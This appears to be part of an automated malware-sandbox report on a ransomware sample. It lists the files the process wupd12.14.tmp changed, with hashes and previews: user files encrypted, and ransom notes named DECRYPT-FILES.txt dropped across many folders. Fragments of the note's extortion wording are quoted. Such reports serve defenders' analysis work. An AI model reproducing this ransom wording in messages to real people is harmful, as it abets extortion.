SHA-512:	1598CADF993BA5B8503A0DB74AFB91D038AF51D7F708423EAF1099B11197F2D699A82287DB545C58127F7AAB530991B36F8974091457D119F2362DC5AAFB71C7
Malicious:	false
Preview:	$...QZ.{.W...@..t..C..:.C.c.......K_.g..0f..:c......+....w....X..G?.}..b0.aJ..;.k.[~cm....9.l0=7yc;@k....Oz.e.6.}.4.G...V...R.qS..'}.J4..K........1c.A4<.....NK.......h...[3.:...y....t..Xt..d....i.#.(...[..mm....iod-...{...j'..y..^D,+..E.A.Pm.......4....f.af..cY..^...H.]..w.#g....C...eW....rD..8.....Z...d?..#e../..Q....y..R..`.....3}..b.d.A.%w.{.4...AK..d..x.O@.3}.}........Vp.9.{..H.hq....I.d..N72.....>...:...R.... .......].P..D.r]..F\|S@U.X.&-.>...kl....,..c..Ss....f....2I.%+..S...]...R.E.......f.af...2.^...&]....?d.D..M...Q)....u.F.).4....\|.j.Gz0.p.0...Z.=mH..di..Gs.8.a.K^xy..D-.8.x?g ...#.W}v.....i......s.B.4..j.,?m.I.Yf7..4.V_Y,..C....B...+*...I.LB...^..._b:.w..j..Q.o...Eo+.I8.....)...j..<....n.=.....A.J+..]...S...P.~.:.y\|..Uw.W.?j.....f.af..$.......G.....s.0./Z.1...[:..Yjs@.g.&qB]e".yt.:../EP.z-o...M...9./]?P...U.3...S. `....U...?.....a8.S:/..&..uq._v.&..^..&.B...\...7~J.Z~.mr.......vB.k...t........zU..m....3jI.J.p.\|8..M.....z.h..

C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-312302014-279660585-3511680526-1004\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Speech\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	101068
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	3F7C18447054AB45E660026F3FE8E69A
SHA1:	A3037146671784F141F0EDE09914109B1B230F27
SHA-256:	41CEC373DCB3A099C0CB4DD8CFB65C568ADB4C6E76630387151D07458A12DF81
SHA-512:	FDA2767A1BF59DDD249B32D4B4552A6479B2653D38B545E7821D91040627F394D508FBCA57E734942DDBABEE192B73B34FE4D3B0F200A1839C90F27028DA9770
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_97BAEB372EC9482D8496D6526E5D896D.dat Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	940
Entropy (8bit):	1.2998239249019163
Encrypted:	false
MD5:	51B669DFB8526E4530E675A3FFE10FB6
SHA1:	BF477B410B18D5843102081C0DDAE1166F978DE1
SHA-256:	7CBC69F398EECC92C5500F3B59454416C8EFD1899FC9A22BABC5FB61803591C5
SHA-512:	532AAD37835189CE488A24563B1D0CEF5624DA97F1CF4A593AF0282AE3A80DD8CC46D14147201CFEC0F5B0516731A0E592EF0FA4DB4BAACE2D88F46CE3439E1A
Malicious:	false
Preview:	L....)...&..O..\|..X.Rr.H..A.bl.<........~..E.....f./......K..6.0L....q...F.\...3.t\......F.q"..lHH.=C..Q.D......U(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Document Themes\1033\TM01790493[[fn=SOHO]].thmx Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.157355992446618
Encrypted:	false
MD5:	4674E2CE64CC29C6E4C839F9637FE77A
SHA1:	12B942FCE2DBF47F519775D245E08A0F995CB0EC
SHA-256:	DCCD842114DB39ADD05423C4CE80A1A9CADDB334DF6CD4CAB59F72C901F2549D
SHA-512:	B27F72C1FBE3FAE7842EA8A60CC22A938E71AA86557D92154E5AE559E8054904C38BC20E053FC5C62DE703738FC93BC8614F52FE53FF5999166EBFEFEA370C5C
Malicious:	false
Preview:	0..........F.z.>..!..+?.k..A....3.h9.Q..J-....2<?.d.t.=.;..:E...u.p.b..^.K...F....S.c......5..q.X.\Z..4<...3..AI......8..\}{...C..%.}.X..G ..f+...........g...^&...uR......k.O....{...x.P..XT.g_/...r]n..x#..f>tkw.P.,7...F&x....s;j1z.....p....f.af

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	36752
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	DD507F9F474F821FEF28D4BE121FF6FF
SHA1:	CE9F35A9FD98C71F7ECDE1EAA9BE022F35E5AEA6
SHA-256:	D38AD86F8AC32279BC30D2B832AD2CFD6ABE708F3DBA9575B2B30EF3D78E934A
SHA-512:	65396D5107E23015C429C0E58730A673C38B9A06F98C91F097D664F11A86C2BCA4A837AC03999DE69CE2B956721E6D194E57526D6EFA5DE267134E50C979E92F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.207050748047995
Encrypted:	false
MD5:	2AD9599E3E97AFEB280D9547D7E2C84B
SHA1:	B4159C1A30498D1113228A34F63322E48DE7D1F7
SHA-256:	70535EA2DED99077D467531608492A899FAED08DAE771827A5B8775E03CBF834
SHA-512:	AD80BB4389527FD781647B56F0182C79A2CA6C41A48E8E54A9A6BC6A316C96D5EFB14C4B6E81D2EC101252F9CD1E3EC0ACBFE0CDF6B0BE2771DC6F0773A806B0
Malicious:	false
Preview:	1f.uS.....6...C...."O...]..T.1N....tA.K...Y.oX_.g.#......i...}I....m;..v..T.R..4k....:.......q.)f..J....*.S......)c.).o7.jq.....r......W........]QkTy.b.Y\|...x{.2.\....t@H(+......&..X.q?.W}.>nY^H.t...}^"N?.\|....A7.G.%..`.+.c.....D$T.K.Ii.m"E....f.af

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	64316
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	F34B7EDF1CCE9814DB579A1309515E57
SHA1:	0416006332156890BBCF834E204F78605B476531
SHA-256:	CA92983C40594E46CA05D995B3EE843400A982A565F51057DD8FA38A819A65D7
SHA-512:	A8C35249056B7961BCE06E6BD16510C6D6230D74A7D98FF288E22996B8A067416C56A9D6A31529D94E56766A84F609AB0845CDCB400679A66B4BA8989C24FD79
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.590112001182281
Encrypted:	false
MD5:	F2A7929283786F979F065A75D466BB19
SHA1:	FA957C78A752E64C3DD500A03FBF1183D733D4DA
SHA-256:	6801CBDC9CB4F9D877E06557B3870F2355F2D017DD0F1B98C318497C1A6A66B2
SHA-512:	3A751AD513CBF23926EC2DE085FD6967E7D3C9B4C50903DE3D1DA7AEED7CCA17E4877F8068E52307FA5717C00CBA09A9A3DFAB8F898837FBA781BD8ECB153CB0
Malicious:	false
Preview:	.f.'}..:.ZP,.7....U.t......=\...P....$.a..c.S...1.\.;.....a.~j.F..n.scW.A.r.pXFU.(.x.@.yik..W.'.....^2.@n.,Q..wH...`....R.....u/.q.r..P..zI...q....z..g..5...4...s.c`n}.......P....K....+....R....F..R)....Pi...............(!0g..pe.te.......f.afuA).Eq..mK.LZ.:g........./..$....gQb:V..9<4.....U...........)..fE.". :..<t5I..H...x...T.U....=...<...A...0..].e.!6%iM....[.%$.....U.x..J..#`.$.I.H.p..0.&.O...=.G............K7.b.L3E..m.M.I......E^!16.........<......._.J......Uw6.v~....Q....R.r......f.af

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.172347312086877
Encrypted:	false
MD5:	3CEDA81C44E5988BA37C862F4C1BC311
SHA1:	56911888EC197CED0327CBDE4E6521C4770CE201
SHA-256:	04C880686A8F7E38D106B218A09269385268BB352C48D90C4D2A89F129F6BE3E
SHA-512:	7688D8A659C2BD376CDB39B5ADEE16471411A39726B424138026BCB9B0B7ABEC6EBD3A5FA6B58B62201646C69A2BFE59402E7F7B8FE316B8BBA7A197200240CA
Malicious:	false
Preview:	.user.............................................l.u.k.e.t.a.y.l.o.r......f.........$\.."[g..................................................2.........h.7.

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.197469971483674
Encrypted:	false
MD5:	10C2E84DAA5620B1748FA86F34EE9257
SHA1:	5F46DE591969525EB2DB72B2A333147057107B19
SHA-256:	876D835639577CF2A46E0EE4C1488A139ED70492337783CBDA1FB295946490E8
SHA-512:	4508072ABA9CCE06CA25876CC29BBE7DACD55813FC6738FC306764BB4A77C7BCC5EF6425FF798F4C4D2743B44465A8B137EDE17F35B5BCCF1A2596C70757478A
Malicious:	false
Preview:	.oDA...<dy.Q......."8....3..L./..i.r..}.1....@...!]1.)..X..m......}K...I...M.. .y..8........d.Y.K.[./.W.rc_.q7.%.]l.....d.g...W)'J..>.6.S..u.]...Z..N3.6.a......,.{:....*.I...M...4...D...c]6..-..r.<.:r....".r....5..E..r1}ub..Lj e..R:5).}.....f.af

C:\Users\user\AppData\Roaming\Microsoft\UProof\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.116617782211151
Encrypted:	false
MD5:	A6A19ABB5CC59ABD95DE6891BBCED214
SHA1:	CC5EE07FD00DD384DB7A30799BCBC7676BD62A53
SHA-256:	28E2B672572C1A8E934E4B8850F3DDAF11B4E44572B7A87BE974D32F81F22DE6
SHA-512:	DD4FC7B86A9D62047F758FE65BA024FE84F90D45C7E39DA4425E1D68F6D23587CDF4415A952451852571DFB7C0ADD4957C3D7E8350E6A7A9F8ACAB5DC260CB6C
Malicious:	false
Preview:	.s.%...O..k.M..4..H..5bg.!#g..s.oZ..>..t...<.n.......M....n.S.J..w...?....u.jJI............2.-...r.n@.d.y.'..WN}..N_..i...?&8.t&.@...tW..Z.:Kzo>...:....k.....(..@zz........Q+.@.....o[....x.wzr.~a..W... ht..AD...j.........c.W.s.B{...<..^;...&Hl....f.af

C:\Users\user\AppData\Roaming\Microsoft\Windows\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	73504
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	A5B3C3D5564303303796AD1ECDCA06C7
SHA1:	0F35620C68D1A901AE692FF6476D74356F20EA82
SHA-256:	BEFA7403EE9E4C63502BF2CC0A0ED207A310AAD3BF1E661487628AF92390CC3E
SHA-512:	F56A84611D6E41DD28BAFFC8ABFEDDCEDE74F20CC5FD7EB96EC193A79C4F255C1664EC2E4DE48F7BA119F3B3A3A532B5FAD126FB742AB4EB59B6A34A0C56CCA4
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.789773520335185
Encrypted:	false
MD5:	4B7374BD45A90CF6C62543BCF897FCB2
SHA1:	967FD9BCAB03BE98791308DBAB13FCEDDD510523
SHA-256:	F140EF7BA280F84BA120D21A5D7093B55970FA3DB75138C291B30DA4CA8E6083
SHA-512:	DC68C1B2B02022AEDD84DCC47AA4CA24B4434236476D40F1E1E664AA6FE81AF2028AED2BD2E2216DA636B79F04DC5975DED615783696B4B89D8E9EBA6B472963
Malicious:	false
Preview:	.1C......p..3...'.&OF,....j..M...<....;.U.tWf.`.d....\|..J~..}.Y~V.3.5..\|hHK.%.(..v._.p...K.vc_...[<.e.g.ql..6gvi.{E...f.1=..X.....G.9.(%..A-...G....S./.}....o.I..~.Lag..d.......V...Ne.i.v.u..X..6..\|7......&..A..zw..J......4...#..m.....-..A....f.af...405I.w.....q.........1.N..\..!3Ga.^.{kA.f..(.}@..N..Dm.....\...<r.?...i..2..Q.:...5.O%f.!Te....X....Le:...:.:R...R]......\|.^........g.V4.S?!.F\t.j.......MA(Q.u+ZN.B.v-.4...]..4.T..Ml........G..#PJ.T.....M.U........?..;z................1]..c....f.af../.G.A..m......z.?.<C.:.......=...;^Y.[u)..9....]..F.F.0...).6,/2&.....{.!{XI.).5..T....,L.9...=^~.Q..7....U]h.;..Q...~0:.>T^...iu.@.F.~........!x.i..._.......Qn..H..z....\|Z....%.h...s"=..Q.l.@.N....,.}9.;.4v...3ZV-......H..9.p..Gz.u.(\A.=....f.af......f.:..n. 5.B.....D.....T..#.K>.8..A.bn...w.P.^.sO.....<....)].0......]NNt.pW....Bo.e...]"YB1..Cr..D^..1..^...7....mv...+..)......V....%.d..X.W*..@.k\G3R.jk.#....9....)....<x.....@...5v.P..4.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	55128
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	8DF4EE855ADEC29A558C8FB7C91B2E49
SHA1:	041A7AF45D3794BBA505E7F86B09E8EEB7E6526B
SHA-256:	8E836FABC253A0A41FA1548A8EE72C211915DFBD998A7DC2A2D498B049F3009A
SHA-512:	E38037BB96D7E76A4274CA49A02F4491C8F50764686E1463800DE83866157A55CE70A8597BAEB1B1941180D4BE9EEC75A294AEEC450371DF9025F560EEEAEA2B
Malicious:	false
